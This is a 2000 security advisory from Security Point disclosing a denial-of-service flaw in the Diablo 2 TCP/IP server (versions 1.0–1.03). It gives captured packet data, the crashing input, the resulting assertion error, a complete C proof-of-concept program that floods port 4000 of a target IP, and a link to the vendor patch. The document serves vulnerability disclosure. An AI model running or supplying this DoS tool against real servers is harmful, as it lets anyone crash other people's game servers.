Security Point Advisories #2 - Diablo 2 TCP/IP Server has a DOS vulnerability that allows anyone who can connect on port 4000 to crash the game. Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03. Fix available here.
b26f84a0c7361a7edf0e302f395e9b83e79ad0422df53972120ed1b86a2807b6
Security Point
info@secpoint.com
http://www.secpoint.com/
Advisory #002
Title: Diablo 2 TCP/IP Sever DoS
Date: 21-08-00
Copyright (c) 2000 SECURITY POINT
Contents:
=========
I Disclaimer
II Introduction
III Description
IV Demonstration code
V Fix
VI Contact
VII Job Offers
VIII Greetings
I - Disclaimer:
===============
This paper is for educational purpose only, Security Point will not be
responsible for any damages whatsoever that have a connection with the
information written in this paper. There are no warranties with regard
to this information, any use of this information is at the user's own risk.
II - Introduction:
==================
We have found a vulnerability in Diablo 2 TCP/IP Server running on port 4000.
If some malformed data is being send to port 4000 while running it will result
in the game crashing. Though windows will NOT crash with it.
III - Description:
==================
While playing around with Diablo2 on port 4000, I discovered some
problems with the TCP/IP Server. When a TCP/IP game in D2 was running, and
connected to port 4000, then sent some info, it came with a "Diablo II Server
Error".
Anyway, this bug turned out to be irregular.
So i began to explore the D2 TCP/IP Server some more. Then while listing on
port 4000 with a program, and trying to create a game, I discovered that D2
sends the following data, to the port if its occupied:
RAW:
>`
>f?g
>eÿ§
>
>
>eÿ§
>
>
>eÿ§
>
>lûJM
>eª§
>è#+ê:Í»ÞùJM
ASCII codes:
>96-0-169-5-24-121-169-5-216-9-0-0-7-2-0-0-176-1-3-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-52-0-0-4-0-0-0-0-0
>102-135-234-40-0-0-0-0-0
>101-255-167-3-0-0-85-170-85-170-71-0-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-0-0-0-0-0-221-0-16-0-130-0-3-0-1-0-255-255-255-255-255-48-255-27-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-0-255-0-255-0-255-0-255-0-255-0-255-0-255-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-104-110-69-50-87-111-111-33-6-0-0-0-42-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-12
>101-255-167-3-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-87-83-1-0-0-0-80-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-1-119-12
>101-255-167-3-0-0-52-0-4-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-103-102-207-127-0-25-0-0-0-15-0-0-0-20-0-0-0-25-0-0-0-0-55-0-0-0-55-0-0-0-15-0-0-0-15-0-0-0-89-0-0-0-89-0-0-1-0-0-0-101-1-0-0-77-0-0-0-105-102-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-74-77-10-0-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-0-0-40-201-109-188-122-114-254-176-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-2-0-200-27-143-165-24-197-31-154-251-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-4-0-104-110-176-142-186-23-65-131-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-6-0-8-193-209-119-88-106-98
>108-251-7-74-77-16-0-12
>101-170-167-3-0-0-2-0-0-1-0-18-4-0-0-0-0-210-0-168-19-243-96-250-188-131-85-1-0-74-77-16-0-2-0-0-1-16-18-4-0-0-0-0-146-0-72-102-20-74-152-15-165-62-3-0-74-77-16-0-0-0-0-1-32-17-4-0-0-0-0-82-0-40-92-197-216-93-127-50-249-4-0-74-77-16-0-0-0-8-1-80-77-4-0-0-12-24-0-0-112-127-12-188-99-44-157-92-248-7-74-77-16-0-2-0-4-1-144-65-4-0-0-46-48-0-0
>232-35-43-234-58-205-187-222-249-7-74-77-16-0-2-0-5-1-80-76-4-0-0-24-24-0-0-136-118-76-211-216-31-221-199-251-7-74-77-0-0-74-77-0-0-0-0-0-0-74
(without the ">"'s, ascii code separated by "-")
Maybe this can be some sort of shutdown message, that D2 sends if the server
wasn't shut down properly? In this data there where 3 eÿ§'s, so I started
testing how the D2 TCP/IP Server would respond if I sent some of them. At
first there wasn't much respond from the server, but if i sendt:
eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§eÿ§\n
some (5-10) times in a row, it would come with the following message:
---------------------------------------------------------------------------
- Diablo II Server Error -X-
---------------------------------------------------------------------------
- /\ Assertion Failure -
- / \ Location: C:\D2\Source\Fog\Src\QServer\Qserver98.cpp, line #272 -
-/____\ Expression: nSize >= 0 && nSize < READ_BUFFER_SIZE -
- --------------- -
- - OK - -
- --------------- -
---------------------------------------------------------------------------
When you click OK it would crash diablo2. Then I tried with much more
eÿ§'s, that resolved in that i only had to send something 1 time. If I
tried with a lot of eg. A's then it wouldn't crash, but if I tried with one
of the other "commands" then it would also respond with the error.
IV - Demonstration code
=======================
/*
* SPD2-DoS.c
*
* SECURITY POINT -- http://www.secpoint.com
*
* (C) COPYRIGHT SECURITY POINT 2000
* All Rights Reserved
*
* This source code is for educational purpose ONLY, Security Point will not
* be responsible for any damages whatsoever that have a connection with this
* code. There are no warranties with regard to this information.
*
* USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
* RESPONSIBILITY FOR THE RESULTS
*
* For questions and suggestions email info@secpoint.com
*
* gcc SPD2-DoS.c -o SPD2-DoS
*
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netdb.h>
#include <string.h>
#define OFFSET 10000
struct in_addr addr;
struct sockaddr_in address;
int d2_socket;
char sendbuffer[OFFSET];
main (int argc, char *argv[]) {
printf("Diablo 2 TCP/IP Server DoS, by http://www.secpoint.com\n");
if (argc != 2) {
printf("Usage: %s ip\n", argv[0]);
exit(0);
}
if ((d2_socket = socket(AF_INET, SOCK_STREAM,0)) < 0) {
perror("socket");
exit(0);
}
address.sin_family=AF_INET;
address.sin_addr.s_addr = inet_addr(argv[1]);
address.sin_port = htons(4000);
if (connect(d2_socket, (struct sockaddr*)&address, sizeof(address)) < 0) {
perror("connect");
exit(0);
}
memset(sendbuffer, 0x60, sizeof(sendbuffer));
while(1) {
write(d2_socket, sendbuffer, strlen(sendbuffer));
}
close(d2_socket);
printf("server killed\n");
}
V - Fix:
========
Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03
Download the new patch from blizzard.com:
(http://www.blizzard.com/support/diablo2/information/patch.shtml)
VI - Contact:
=============
If you have further questions regarding this bug, then you can contact us at
www.secpoint.com
info@secpoint.com
VII - Job Offers:
=================
We are looking for people for:
Penetration testing of Firewalls and TCP/IP based networks.
You must have a wide knowledge of TCP/IP protocols and applications, plus solid
technical experience of UNIX or Windows NT.
The best candidate will have security experience in one or more of the
following:
ú Penetration testing.
ú Linux and other network operating systems .
ú Web technologies: HTML, XML, JavaScript, Java, php, and asp.
ú Firewall, VPN and intrusion detection integration.
ú Product Certs and other forms of education.
ú Routers, hubs, switches.
Finally, successful candidates must have the ability to take on responsibility
and work unsupervised in our offices and on customer sites. They must also be
able to communicate their findings to client staff via written reports and
presentations.
Another important factor is that you have a CLEAN criminal record.
Send your CV to info@secpoint.com (in MS Word, PDF or plain text formats)
http://www.secpoint.com
VIII - Greetings:
=================
: SecurityFocus.com, ADM